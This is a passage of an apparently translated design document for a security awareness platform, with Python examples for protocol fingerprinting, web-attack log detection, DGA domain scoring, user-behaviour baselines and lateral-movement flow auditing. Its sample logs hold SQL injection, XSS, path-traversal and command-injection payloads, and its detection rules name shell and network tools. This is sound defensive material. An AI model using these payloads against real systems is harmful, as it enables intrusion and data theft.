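if __name__ == "__main__":
    svc = AuthService()
    svc.add_user("admin", "Initial-Pass-1")
    print([svc.login("admin", "wrong") for _ in range(MAX_FAILURES)])
```

A lockout keyed only on the account name can be turned into a denial of service against that account; a deployment would normally pair it with a per-source rate limit and log every lock event to the audit trail the bastion hosts provide.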


Program Functional Design


From the perspective of network security construction, network traffic in the past can be said to be either black or white, black is risky traffic, white is safe traffic, and the black and white list filtering of firewall-type border protection equipment together with feature-based methods can intercept most threats. However, with the increasing number of Internet access devices, the increasing complexity of the network structure, the network environment has seen more and more exploitable weaknesses, hacker attacks are constantly improving and mutating, forming a gray area between black and white, and the scale is still expanding.


Traditional methods have struggled to effectively detect potential risks in the gray area, for which we adopt a key technology for dealing with unknown threats, through which traces of hacker intrusion can be found faster and more accurately, so as to kill the hacker's attack plan in the cradle. Designed around the characteristics of hacker attacks and considering every link of the hacker attack chain, this is the key capability for guarding the intranet security posture and an indispensable guarantee of enterprise network security in the face of constantly upgrading hacker attack methods.


Big Data Platform Processing Architecture


The platform adopts a hierarchical big data processing structure design, forming a complete processing logic process from data collection to final data analysis and presentation. The layers are divided as follows:


Data Acquisition Layer


Collection includes terminal data, traffic collection, middleware data, third-party device logs and threat intelligence integration. This layer provides a variety of interfaces for traffic and log data collection and integration, supporting syslog, web service, RESTful API, WMI and other collection methods.


Data preprocessing layer


The collected data is pre-processed, including data cleansing, data merging and data enrichment, and ultimately converted into formatted data understandable by the platform, stored in file form while waiting for analysis.


Big Data Analytics Layer


Reads preprocessed data for offline computation, or reads Elasticsearch (ES) data for real-time computation. This is where detection, analysis and statistics over the network-wide security data take place; combined with threat intelligence, behavioural analysis, intelligent analysis and other technologies, it discovers the current state of security threats, while the built-in security correlation rules consolidate the data into alarms.


Data storage layer


Analysis data and results are stored in the Elasticsearch (ES) engine, which provides fast retrieval. At the same time, recent statistics that need to be presented quickly are stored in MongoDB, where they can be read directly with less rendering and memory overhead than querying the ES engine.


Data service layer


The whole data visualization display is designed as an app: it obtains data from the data storage layer through interfaces, reads the data to be displayed, and provides the various data security visualization services and external interface services.


The visualization uses Ext JS as the JavaScript framework, ECharts as the graphics library, and a Vue architecture as the rendering support for the big-screen visualization.


Big data analytics support: Following the Hadoop computing framework, it uses Hadoop MapReduce for parallel processing, with reliability and fault tolerance, and supports large-scale cluster deployment and analysis of massive data sets. The Elasticsearch engine (a common engine for big data analytics) provides fast retrieval of the underlying metadata, analytic data and analysis results.


High-performance processing capabilities: The framework features above provide high-performance analysis. Running on the server hardware as the basic platform, the system achieves real-time analysis of a billion logs a day (about 3 TB of data) while supporting second-level queries over billion-scale log volumes. Performance requirement indicators: a stand-alone node supports 20,000+ EPS of data ingestion into the library and 100,000+ EPS of data analysis; with 32 GB of memory, second-level queries over 100 billion records are supported.


Compute and storage scalability: Based on the Hadoop computing framework, it supports a database-based cluster deployment mode; horizontal cluster expansion greatly improves the storage space and analysis performance of the big data platform. The following features are required: support for horizontal cluster expansion to 64 analysis platforms, support for vertical hierarchical cascading of 32 analysis platforms, automatic data balancing, distributed storage, and optional multi-copy replication to improve data fault tolerance.


Asset identification and vulnerability assessment


Asset auto-discovery: Adaptive identification of terminals, servers and other assets.


Server information recognition: Automatic identification of server asset information such as operating system and open ports. It can be used to discover shadow assets, or, with regular patrols, to avoid security problems caused by frequent business updates (e.g., omissions and misconfigurations).


Risky ports/applications: Identify risky ports opened by server assets and how they are being used (e.g., standard ports running non-standard protocols), identify illegal connections caused by exposure of risky access methods (e.g., RDP, SSH, databases), and identify the specific application even when it runs on a non-standard port.
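

The following is an added illustration of that capability, not code from the platform described in this document. It identifies a service from the first bytes of a stream rather than from the port number, using a few hand-written protocol fingerprints (SSH banner, HTTP status line, TLS record header, MySQL handshake, RDP X.224 connection confirm over TPKT), then flags three conditions: a known protocol on a non-standard port, a standard port carrying a different protocol than expected, and an exposed remote-access or database service. The host addresses, ports and captured bytes are constructed sample data; the fingerprint set is deliberately small and is an assumption of the example.

```python
import re

# Constructed sample captures (first bytes seen on each host:port), not real traffic.
SAMPLE_CAPTURES = {
    ("10.0.1.15", 2222): b"SSH-2.0-OpenSSH_8.9p1 Ubuntu-3\r\n",
    ("10.0.1.20", 8080): b"HTTP/1.1 200 OK\r\nServer: Apache-Coyote/1.1\r\n\r\n",
    # MySQL handshake: 3-byte length, sequence 0, protocol 10, NUL-terminated version string
    ("10.0.1.30", 3307): b"\x4a\x00\x00\x00\x0a8.0.33\x00",
    # RDP: TPKT header (03 00 + length) carrying an X.224 Connection Confirm (0x06 0xd0)
    ("10.0.1.40", 443): b"\x03\x00\x00\x0b\x06\xd0\x00\x00\x12\x34\x00",
    # TLS record header (handshake, version 3.1) on a port that should carry plain HTTP
    ("10.0.1.50", 80): b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03",
}

# (protocol, default ports, regex matched against the first bytes of the stream)
FINGERPRINTS = [
    ("ssh",   {22},        re.compile(rb"^SSH-\d\.\d-")),
    ("http",  {80, 8080},  re.compile(rb"^(HTTP/1\.[01] \d{3}|GET |POST |HEAD )")),
    ("tls",   {443, 8443}, re.compile(rb"^\x16\x03[\x00-\x03]")),
    ("mysql", {3306},      re.compile(rb"^.{3}\x00\x0a[0-9.]+\x00", re.DOTALL)),
    ("rdp",   {3389},      re.compile(rb"^\x03\x00.{2}\x06\xd0", re.DOTALL)),
]
PORT_EXPECTATION = {p: proto for proto, ports, _ in FINGERPRINTS for p in ports}
RISKY_REMOTE_ACCESS = {"ssh", "rdp", "mysql"}   # management / database access exposed on the network


def identify_protocol(payload: bytes):
    """Return (protocol, default_ports) for the first fingerprint that matches, else ("unknown", set())."""
    for proto, ports, rx in FINGERPRINTS:
        if rx.match(payload):
            return proto, ports
    return "unknown", set()


def assess_service(host: str, port: int, payload: bytes) -> dict:
    """Identify the application on host:port from its bytes and list the risk findings for it."""
    proto, default_ports = identify_protocol(payload)
    findings = []
    if proto != "unknown" and port not in default_ports:
        findings.append(f"{proto} running on non-standard port {port}")
    expected = PORT_EXPECTATION.get(port)
    if expected and proto != "unknown" and proto != expected:
        findings.append(f"standard port {port} carries {proto} instead of {expected}")
    if proto in RISKY_REMOTE_ACCESS:
        findings.append(f"exposed {proto} remote-access/database service")
    return {"host": host, "port": port, "protocol": proto, "findings": findings}


def scan_captures(captures=SAMPLE_CAPTURES) -> list:
    return [assess_service(h, p, data) for (h, p), data in captures.items()]


if __name__ == "__main__":
    for r in scan_captures():
        print(f'{r["host"]}:{r["port"]} -> {r["protocol"]}; {"; ".join(r["findings"]) or "ok"}')
```

In a real probe the payload would be the first segment of each observed TCP stream, and the fingerprint table would be far larger; the point is that port 443 carrying RDP and port 80 carrying TLS are both reported, which a port-number-only inventory would miss.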


Organizational hierarchy: Branch units and the like can be divided along multiple levels and dimensions, assets assigned to them and custom attributes set on the assets, making assets easy to locate and manage. The configured organizational hierarchy is also combined with the network-wide security situational awareness display to show the overall security situation.


Real-time vulnerability analysis: For application traffic passing through the device, the traffic is parsed according to its application, and the parsed application data is matched against a real-time vulnerability analysis and identification library to discover possible vulnerabilities in the server's operating system, general-purpose Web software or frameworks, Web applications, protocols and so on. It also provides built-in and customizable weak-password libraries to analyze the passwords of user-specified servers and determine whether a weak-password risk exists. Because this analysis is passive, it only covers servers and protocols whose traffic actually passes the probe.


Asset operation detection: Using SNMP, the operating information of assets and devices is collected and monitored, with CPU, memory, disk, upstream and downstream traffic and other metrics displayed in real time and kept as historical records, so that administrators can compare against history to analyze abnormal resource usage on a device.


Multi-dimensional threat detection


Basic detection capabilities


Attackers who break into an enterprise intranet do not always rely on sophisticated skills; on the contrary, reviews of network security incidents show that many intrusions that caused losses relied only on traditional, simple means. Detection technology ranges from simple to complex, but for detecting intrusions the basic detection capabilities are also critical. Basic detection capability refers to the ability to detect traditional and common abnormal traffic, mainly including abnormal session detection, Web application security detection and sensitive data leakage detection.


Abnormal session detection analyzes and detects abnormal communication behaviour in multiple network scenarios, including outbound connection analysis, intermittent session connections, encrypted channel analysis, abnormal domain name analysis and upstream/downstream traffic analysis. Web application security detection covers B/S architecture applications written in mainstream scripting languages such as ASP, PHP and JSP: it detects webshell backdoor script uploads, SQL injection, XSS, system command and other injections, CSRF attacks, malicious crawlers, file inclusion, directory traversal, information leakage and other attacks, and provides protection for mainstream CMS such as DedeCMS, PHPCMS and PHPWind. Sensitive data leakage detection filters and detects information by file type and sensitive keywords, based on user-defined sensitive information.
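

As an added example (not the platform's own detection engine), the block below runs signature-based Web application security detection over a few constructed access-log lines in Combined Log Format. It decodes the request path twice so that double-encoded payloads are normalised, then applies rules for SQL injection, XSS, directory traversal, command injection, webshell upload (a POST whose file parameter names a script) and known scanner User-Agents. The log lines, IP addresses and the rule set are assumptions of the example; a production engine would carry far more signatures and parse the request body as well.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines in Combined Log Format (not taken from a real server).
SAMPLE_LOG = """\
10.0.5.21 - - [12/Mar/2024:10:15:32 +0530] "GET /ctos/container?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Mar/2024:10:16:01 +0530] "GET /ctos/container?id=1%27%20UNION%20SELECT%20username,password%20FROM%20users-- HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Mar/2024:10:16:20 +0530] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 300 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Mar/2024:10:17:05 +0530] "GET /download?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 0 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2024:10:20:30 +0530] "POST /upload.php?filename=shell.php HTTP/1.1" 200 10 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2024:10:21:00 +0530] "GET /admin/?cmd=;cat%20/etc/passwd HTTP/1.1" 200 1200 "-" "sqlmap/1.7.2"
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Signature rules applied to the URL-decoded request path (case-insensitive).
RULES = {
    "sqli": re.compile(r"\bunion\b.{0,40}\bselect\b|'\s*or\s*'?\d+'?\s*=\s*'?\d+|\bsleep\(\d+\)|information_schema", re.I),
    "xss": re.compile(r"<script\b|\bon(error|load|mouseover)\s*=|javascript:", re.I),
    "traversal": re.compile(r"\.\.[/\\]"),
    "cmdi": re.compile(r"(;|\|\||&&|\$\()\s*(cat|ls|id|whoami|wget|curl|bash|sh|nc)\b", re.I),
}
WEBSHELL_UPLOAD = re.compile(r"\b(filename|file|name)=[^&]*\.(php\d?|phtml|jsp|jspx|asp|aspx)\b", re.I)
SCANNER_UA = re.compile(r"sqlmap|nikto|nmap|masscan|dirbuster|gobuster|wfuzz|acunetix", re.I)


def decode_path(path: str) -> str:
    # Decode twice so that double-encoded payloads (%252e%252e) are also normalised.
    return unquote(unquote(path))


def classify_request(method: str, path: str, ua: str) -> list:
    """Return the sorted list of attack categories matched by one request."""
    decoded = decode_path(path)
    categories = [name for name, rx in RULES.items() if rx.search(decoded)]
    if method.upper() == "POST" and WEBSHELL_UPLOAD.search(decoded):
        categories.append("webshell_upload")
    if SCANNER_UA.search(ua):
        categories.append("scanner_ua")
    return sorted(categories)


def scan_log(text: str = SAMPLE_LOG) -> list:
    results = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue   # unparsable line: a real deployment should count and review these
        results.append({"client": m["client"], "method": m["method"], "path": m["path"],
                        "categories": classify_request(m["method"], m["path"], m["ua"])})
    return results


if __name__ == "__main__":
    for r in scan_log():
        print(r["client"], r["method"], r["path"][:60], r["categories"] or "clean")
```

The double decode is the detail worth copying: a single pass leaves `%252e%252e/` looking harmless. Signature rules of this kind are the "basic" layer the text refers to; they catch the traditional, simple techniques that still account for many intrusions, and are complemented by the behavioural detection described later.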


Deep Inspection Capability


Attackers who bypass traditional protection measures usually choose to lurk and hide first. Viruses are one of the common tools used to break into the intranet; a virus program generally does not act immediately after entering a system, but hides for weeks, months or even years inside legitimate files, infecting other systems undetected. Most viruses work by accessing specific URLs over HTTP to obtain or submit information, and some use DNS to look up the IP of a domain name and then establish a connection with that IP to exchange data. For example, to communicate with its C&C server a bot queries DNS for the IP of the corresponding C&C server; these URL addresses and the hosts behind the resolved domain names are usually the key channel through which the virus exchanges information, and identifying these hosts allows the connection between the intranet virus and the outside world to be blocked. These attacks are more sophisticated and insidious than traditional attacks, and the deep detection capability is designed to detect this kind of hidden malicious behaviour.


The deep detection capability of the Security Awareness Platform provides a session-level view of network traffic, builds a model of normal traffic from the normal behavioural profile of network traffic, and uses it to decide whether traffic is abnormal; it can detect network worms, horizontal network scanning, vertical network scanning, IP address scanning, port scanning and ARP spoofing. Deep detection also includes password brute-force detection, weak-password scanning detection, black link (hidden link) detection, and terminal virus/malware detection. Because zombie machines and virus programs need to communicate with external C&C servers in order to be controlled, the platform's DGA detection algorithm, which combines a Markov model with information entropy, uses machine learning to identify whether a domain name was generated by an algorithm, estimates a domain reputation value from its randomness, and thereby detects traffic related to malicious IP addresses.
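

To make the Markov-plus-entropy idea concrete, here is an added example written for this document; it is not the platform's algorithm, whose thresholds and training data are not published here. It trains a first-order character Markov model on a constructed list of benign domain labels (standing in for an organisation's own DNS history), then scores a candidate label on its Shannon entropy, its mean log-probability under the model, and the fraction of its bigrams that were never observed in benign traffic. A label with mostly unseen bigrams, or very high entropy, is reported as suspicious. The benign list, the thresholds and the simplified "label left of the last dot" rule are assumptions of the example.

```python
import math
from collections import Counter, defaultdict

# Constructed list of benign second-level labels, standing in for the organisation's own
# history of resolved domains (the real training set would be taken from DNS logs).
BENIGN_LABELS = [
    "google", "facebook", "microsoft", "amazon", "wikipedia", "youtube", "twitter",
    "linkedin", "github", "apple", "netflix", "office", "update", "mail", "cloud",
    "secure", "login", "portal", "terminal", "container", "shipping", "customs",
    "gateway", "service", "support", "download", "images", "static", "content", "cdn",
]
ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789-"   # characters allowed in a DNS label


def shannon_entropy(s: str) -> float:
    """Shannon entropy in bits per character; 0 for a single repeated character."""
    n = len(s)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


class BigramMarkov:
    """First-order Markov model over characters, trained on benign labels."""

    def __init__(self, labels):
        self.transitions = defaultdict(Counter)
        for label in labels:
            for a, b in zip(label, label[1:]):
                self.transitions[a][b] += 1

    def score(self, label: str):
        """Return (mean log2 transition probability, fraction of bigrams never seen in training)."""
        pairs = list(zip(label, label[1:]))
        if not pairs:
            return 0.0, 1.0
        total, unseen = 0.0, 0
        for a, b in pairs:
            row = self.transitions[a]
            if row[b] == 0:
                unseen += 1
            # Laplace smoothing so an unseen transition gets a small, non-zero probability
            p = (row[b] + 1) / (sum(row.values()) + len(ALPHABET))
            total += math.log2(p)
        return total / len(pairs), unseen / len(pairs)


def registrable_label(domain: str) -> str:
    # Simplification: the label left of the last dot. Real deployments need a public-suffix
    # list so that "example.co.uk" yields "example" rather than "co".
    parts = domain.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def score_domain(model: BigramMarkov, domain: str) -> dict:
    label = registrable_label(domain)
    entropy = shannon_entropy(label)
    log_prob, unseen = model.score(label)
    # Thresholds are assumptions for this example; tune them on your own benign traffic.
    suspicious = unseen > 0.5 or entropy >= 4.0 - 1e-9
    return {
        "domain": domain, "label": label, "entropy": round(entropy, 3),
        "markov_log2": round(log_prob, 3), "unseen_ratio": round(unseen, 3),
        "verdict": "suspicious" if suspicious else "benign",
    }


if __name__ == "__main__":
    model = BigramMarkov(BENIGN_LABELS)
    for d in ["google.com", "portal.shipping.lk", "xkqjzvwpt.com", "k3j9x2q8w7z5m4n1.net"]:
        print(score_domain(model, d))
```

Entropy alone is a weak signal (a nine-character random label has at most log2(9) ≈ 3.17 bits, below most entropy thresholds), which is why the transition model matters: pronounceable benign labels reuse a small set of bigrams, while algorithmically generated ones mostly do not.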


UEBA and Access Anomaly Detection


In an enterprise network, a host belonging to an employee who is not on night shift accessing a business server at 4:00 a.m. is an access anomaly. In the past, user business access control and Web business access control relied mainly on rules, but because individual behaviour patterns differ widely, and because attackers increasingly disguise themselves as normal users to evade access rules, rule-based control strategies have difficulty dealing with access anomalies effectively. Machine learning algorithms can model diverse user behaviour patterns and Web access patterns and achieve better detection results.


The platform's user business access anomaly detection is based on a user's historical behaviour and the behavioural similarity between users; the similarity is analyzed statistically and modelled with machine learning, so that users, hosts and other entities are analyzed (UEBA), anomalous access to business systems is identified, and potential threats such as stolen customer credentials or compromised user hosts are discovered. Web business access anomaly detection uses Markov random processes and Bayesian recursive estimation, combined with other machine learning algorithms, to analyze and model the interaction behaviour of Web business, so as to detect attacks on Web business such as data leakage, webshells, intranet data proxy forwarding and other high-risk behaviours.
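

The 4:00 a.m. example above can be turned into a small baseline model. The code below is an added illustration, not the platform's UEBA implementation: it builds an hour-of-day histogram and a set of accessed targets per user and per peer group (here the user's role stands in for "similar users"), smooths the histograms, and flags an access only when the hour is unusual both for the user and for the peer group, or when the target has never been accessed by either. The 20-day history, users, roles and the 0.02 probability threshold are constructed assumptions.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta


# Constructed 20-day access history: (user, role, target system, timestamp). Planners work
# 08:00-17:00; the night-operations user works 22:00-05:00. Not real data.
def build_history():
    history = []
    for day in range(20):
        base = datetime(2024, 3, 1) + timedelta(days=day)
        for hour in range(8, 18):
            history.append(("alice", "planner", "ctos-app", base + timedelta(hours=hour)))
            history.append(("bob", "planner", "ctos-app", base + timedelta(hours=hour)))
        for hour in (22, 23, 0, 1, 2, 3, 4, 5):
            history.append(("carol", "night_ops", "ctos-app", base + timedelta(hours=hour)))
    return history


HISTORY = build_history()


class AccessBaseline:
    """Hour-of-day and target baselines per user and per peer group (role)."""

    def __init__(self, history, smoothing=1.0):
        self.smoothing = smoothing
        self.user_hours = defaultdict(Counter)
        self.role_hours = defaultdict(Counter)
        self.user_targets = defaultdict(set)
        self.role_targets = defaultdict(set)
        self.user_role = {}
        for user, role, target, ts in history:
            self.user_role[user] = role
            self.user_hours[user][ts.hour] += 1
            self.role_hours[role][ts.hour] += 1
            self.user_targets[user].add(target)
            self.role_targets[role].add(target)

    def hour_probability(self, counter: Counter, hour: int) -> float:
        # Laplace-smoothed probability of activity in this hour (24 possible hours)
        total = sum(counter.values())
        return (counter[hour] + self.smoothing) / (total + 24 * self.smoothing)

    def assess(self, user: str, target: str, ts, threshold: float = 0.02) -> dict:
        """Score one access event; ts may be a datetime or an ISO-8601 string."""
        if isinstance(ts, str):
            ts = datetime.fromisoformat(ts)
        role = self.user_role.get(user)
        reasons = []
        p_user = self.hour_probability(self.user_hours[user], ts.hour)
        p_role = self.hour_probability(self.role_hours[role], ts.hour) if role else 0.0
        # Anomalous only if the hour is unusual both for the user and for similar users,
        # so that a night-shift worker's 04:00 access is not flagged.
        if p_user < threshold and p_role < threshold:
            reasons.append(f"access at {ts.hour:02d}:00 is unusual for {user} and for peers in role {role}")
        if target not in self.user_targets[user] and target not in self.role_targets.get(role, set()):
            reasons.append(f"target {target} never accessed by {user} or peers")
        if user not in self.user_role:
            reasons.append(f"unknown user {user}")
        return {"user": user, "target": target, "time": ts.isoformat(), "p_user": round(p_user, 4),
                "p_role": round(p_role, 4), "anomalous": bool(reasons), "reasons": reasons}


if __name__ == "__main__":
    baseline = AccessBaseline(HISTORY)
    for user, target, when in [("alice", "ctos-app", "2024-03-25T04:00:00"),
                               ("carol", "ctos-app", "2024-03-25T04:00:00"),
                               ("alice", "ctos-db", "2024-03-25T10:00:00")]:
        print(baseline.assess(user, target, when))
```

The peer-group check is what separates this from a plain per-user rule: Carol's 04:00 access is normal for her role, Alice's is not for hers, and the same code gives both answers without a hand-written schedule.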


Comprehensive detection before, during and after an incident


Compromised Host Detection


After attackers break into the intranet they place Trojans and backdoors on the compromised hosts in order to control them. Once they control a large number of compromised hosts, they also use them to launch DDoS attacks, scanning, brute-forcing and other malicious actions against target hosts. Compromising a host is the attacker's first step into the intranet, so discovering compromised hosts in time stifles the attacker's further actions as early as possible and protects the enterprise network environment.


More than 20 compromised-host detection algorithms are currently known, such as rule-based and library-based algorithms. The platform's built-in algorithm analyzes features such as virus behaviour, abnormal outbound connection behaviour and common attack techniques; it combines fast-flux identification, iForest (isolation forest), host network traffic models and protocol model learning with the linkage analysis provided by the big data correlation engine and DGA domain name discrimination to build a fused detection model that discovers out-of-control hosts in time.


Horizontal Threat Awareness


For most customers, core business systems are protected by a large number of security systems and detailed management procedures so that non-public services do not have problems; non-public service systems are often not even exposed to the attacker's direct view. It is therefore usually difficult for attackers to penetrate these systems directly, so the classic APT process of "attack and infiltrate - control a springboard - move laterally - control the target - steal and destroy" first attacks and controls weakly defended, non-core internal assets and uses them as a springboard for infiltration and attack.


Lateral threat detection focuses its monitoring and analysis on the behaviour logic of internal operations and assets, monitoring inter-system access requests, packet content and business logic in real time, including:


Feature-matching-based attack detection, i.e., scanning, infiltration and other traditional attacks;


Violation detection based on whitelist policies, discovering asset behaviour that deviates from predefined security policies;


Behavioural anomaly detection based on UEBA technology, identifying deviations of an asset's behavioural logic from its own security baseline or from the baseline of similar assets;


Common risky remote logins and database request behaviour.


The behavioural characteristics of these assets are used to determine whether they appear to have been taken over and turned into internal attack springboards. The attack-penetration and springboard-control stages are in most cases based on 0-day and unknown threats, but internal lateral movement is inevitably accompanied by abnormal access requests, packet content and behavioural logic from the controlled assets, which is an effective means of detecting APT attacks; by detecting and blocking attacks at the lateral movement stage, the core business can be prevented from being compromised and sensitive information from being lost.
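

The whitelist-policy and risky-login items in the list above are easy to express over flow records, so here is an added example (not the platform's implementation) that does so. It maps addresses to zones with the standard `ipaddress` module, treats every (source zone, destination zone, destination port) triple that is not on the allow list as a violation, tags the two cases the text singles out (remote login not originating from the jump host, database access not originating from the application tier), and separately reports a source that contacts many internal hosts on one port, the fan-out pattern of horizontal scanning. The zones, the policy table, the flow records and the fan-out threshold are constructed for the example.

```python
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Network zones (constructed addressing for the example; longest prefix listed first).
ZONES = [
    ("jump_host",    ip_network("10.20.0.5/32")),
    ("app_servers",  ip_network("10.20.0.0/24")),
    ("db_servers",   ip_network("10.30.0.0/24")),
    ("workstations", ip_network("10.10.0.0/16")),
]
# Whitelist policy: (source zone, destination zone, destination port). Anything else is a violation.
ALLOWED = {
    ("workstations", "app_servers", 443),
    ("app_servers", "db_servers", 3306),
    ("jump_host", "app_servers", 22),
    ("jump_host", "db_servers", 22),
    ("jump_host", "app_servers", 3389),
}
REMOTE_LOGIN_PORTS = {22, 3389}
DATABASE_PORTS = {1433, 1521, 3306, 5432}


def zone_of(ip: str) -> str:
    addr = ip_address(ip)
    for name, net in ZONES:
        if addr in net:
            return name
    return "external"


def check_flow(src: str, dst: str, dport: int) -> dict:
    """Evaluate one flow against the whitelist and tag the risky patterns the policy cares about."""
    s, d = zone_of(src), zone_of(dst)
    allowed = (s, d, dport) in ALLOWED
    tags = []
    if not allowed:
        tags.append("policy_violation")
        if dport in REMOTE_LOGIN_PORTS and s != "jump_host":
            tags.append("risky_remote_login")
        if dport in DATABASE_PORTS and s != "app_servers":
            tags.append("risky_database_request")
    return {"src": src, "dst": dst, "dport": dport, "src_zone": s, "dst_zone": d,
            "allowed": allowed, "tags": tags}


def detect_fanout(flows, port: int, threshold: int = 10) -> dict:
    """Sources contacting at least `threshold` distinct internal destinations on one port (horizontal scan)."""
    targets = defaultdict(set)
    for src, dst, dport in flows:
        if dport == port and zone_of(dst) != "external":
            targets[src].add(dst)
    return {src: len(dsts) for src, dsts in targets.items() if len(dsts) >= threshold}


# Constructed flow records (src, dst, dport), as a probe would export them.
FLOWS = [
    ("10.10.3.44", "10.20.0.10", 443),    # workstation -> app over HTTPS: allowed
    ("10.20.0.10", "10.30.0.5", 3306),    # app -> database: allowed
    ("10.20.0.5", "10.30.0.5", 22),       # jump host -> database over SSH: allowed
    ("10.10.3.44", "10.30.0.5", 3306),    # workstation straight to the database: violation
    ("10.10.3.44", "10.20.0.10", 3389),   # RDP to an app server bypassing the jump host: violation
] + [("10.10.3.44", f"10.10.3.{i}", 445) for i in range(50, 62)]   # SMB fan-out inside the workstation segment


def audit(flows=FLOWS):
    violations = [r for r in (check_flow(*f) for f in flows) if not r["allowed"]]
    return violations, detect_fanout(flows, 445)


if __name__ == "__main__":
    violations, fanout = audit()
    for v in violations:
        print(v["src"], "->", v["dst"], v["dport"], v["tags"])
    print("fan-out on 445:", fanout)
```

Note that the whitelist is evaluated per flow while the fan-out check is evaluated per source over a window; the twelve SMB flows from one workstation are each a violation on their own, but only together do they show the scanning behaviour that marks a springboard host.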


Outreach Threat Awareness


Many customers complain that traditional network security devices and solutions focus only on functionality, and that even professional security operations staff find it difficult to understand the security status of the whole network in real time. Enterprises need not only a secure network environment but also a simple, intuitive understanding of its security status. For post-incident detection, for example, customers care about whether their core business servers have been compromised, whether their business systems have outbound connections, which countries and provinces those connections go to, what risks and posture the outbound access presents, and how to resolve them.


Inspecting the outbound traffic of a business server is an effective means of determining its security status, because a compromised server generally behaves differently from one operating normally. By analyzing the server's outbound connection behaviour, a model of its normal operation is built and used as the benchmark for detecting abnormal operation. The visualization platform presents the outbound connections of the customer's business systems so that the customer can intuitively perceive their dynamics, forming a complete "outbound situation awareness, outbound situation understanding, outbound situation prediction" closed loop with almost zero operation and zero learning cost; combined with a big-screen display, it makes the security posture perceivable and the security value presentable.


Successful attacks during an incident


In a typical APT attack, the attacker does not stop at controlling the target host or system, but uses it as a medium for further attack and penetration. Therefore, when analyzing and judging a security incident, it is necessary not only to analyze the source and mode of the attack in order to determine the current emergency response plan and the subsequent security hardening strategy, but also to track and analyze the attack's possible impact surface and methods, to confirm whether this successful attack has affected other assets, and, if further harm has been caused, to identify it and start the appropriate disposal process.


External risky access


For most organizations, external attackers are still the main threat they face, so data from untrusted or relatively uncontrollable networks such as the Internet or branch offices is analyzed and inspected in depth, correlating its direct access logic, access requests and behavioural characteristics to detect directory traversal, FTP brute-forcing, exploitation of well-known vulnerabilities, webshell file upload and many other mainstream high-risk penetration attacks.


Intelligence correlation and intelligent analysis


Threat Intelligence Correlation


Today's network security offence and defence has reached a situation where attackers are organized and premeditated, while defenders rely on detection and tactics. To protect an enterprise's own network, hardware and software infrastructure is not enough; threat intelligence is also needed to understand attackers' routines and movements, so that we know both ourselves and the enemy. Threat intelligence is evidence-based knowledge (including context, mechanisms, impact, etc.) about an existing or emerging threat, used to inform decisions on responding to that threat or hazard.


The Security Awareness Platform utilizes threat intelligence such as threat rules and advance risk assessments to match current events in order to identify and respond to threats. The intelligence system has the following capabilities:


Threat assessment of an incident based on the level of credibility of the incident participants;


In cases where the threat level generated by an event does not reach the alert level, the threat level is increased if the event matches the threat intelligence profile;


Filtering out most incidents of low threat behavior facilitates the analysis of potential threats;


Sharing mechanisms and synergies are utilized to ensure that attacks encountered after the first attack can be quickly identified and responded to;


Raising the cost of attacking for attackers, who need more sophisticated hiding methods to bypass this system of concerted defense;


Targeted threat intelligence can detect APT attacks;


Threat intelligence provides more dimensional information for analysis of security logs, events, etc. Threats lurking in normal traffic can be discovered through correlation analysis methods.


Big Data Correlation Analysis


Traditional network border security technology tends to focus on preventing attacks from the Internet, mainly HTTP or SMTP attacks on public-facing Web servers. Once an attacker bypasses the border protection and enters the intranet, they generally first take control of a server inside the local network and then use it as a base to attack other hosts in the network. It is difficult to detect such an intrusion from a single data source. To address this, big data correlation analysis digs out traces of intrusion behaviour from multi-dimensional massive data, helping users detect unknown threats effectively and thereby enhancing network security capabilities.


The big data analysis engine of the network-wide security awareness platform collects raw network traffic through dedicated probe devices and will gradually support collecting from AF, AC, EPS, SSL and other security devices and hosts as data sources. Combined with the cloud threat intelligence database, it performs multi-dimensional information fusion to achieve event correlation, cross-correlation and heuristic correlation based on attack scenarios, so as to assess the credibility, threat level and risk value of a security event. Through big data correlation analysis the engine discovers compromised hosts and security threats in the network, identifies potential security risks to the business and advanced APT attack behaviour, and at the same time completes effective attack detection and exploited-vulnerability detection through attack-scenario correlation. It then traces the attack back to its source and, through graph correlation analysis, gathers all information about the attacker (IP, domain, virus, hacking tools, attacker location, attack methods, historical attack records), reconstructs the entire attack scenario to form an attack story, and helps customers better understand, analyze and forensically verify the entire attack event.


Deep Dive and Assisted Decision Making


Security overview with big screen visibility


The Security Overview abandons the one-size-fits-all network topology display of traditional SOC and network management platforms and instead adopts a display of key business assets and their business logic relationship network:


Security overview view: Shows at a glance the security risk status of information assets across the network, the logical relationships in the network and abnormal access behaviour, as well as the path and scope of impact of suspicious attacks, meeting the need of network and security managers to quickly understand the network security posture.


For leaders and decision makers concerned with the overall information security posture, big-screen displays from many different perspectives, including network-wide attack monitoring, branch supervision and risky outreach monitoring, provide cockpit-style decision support for information security executives:


Network-wide attack monitoring visualization: The attack posture map presents the geographical distribution of attacks and outbound connections, as well as rankings of the various attack types; using the geographic distribution of attackers, combined with their own business and user characteristics, security managers can set up external black and white lists to reduce the risk of business compromise.


Branch supervision visualization: Situational monitoring of comprehensive security information across the network, supporting a logical topology hierarchy from the overall security posture of the whole network down to the monitoring of information assets and security data, realizing all-round visualization and supervision.


Risky outreach monitoring visualization: Outbound connections from compromised business systems and users are an important indicator of data theft and intrusion. Visual monitoring of outreach risk clearly shows the business application that initiated the outbound access, its destination, the application, the time and frequency of the outbound access, and other information.


Latent Threat Goldeneye


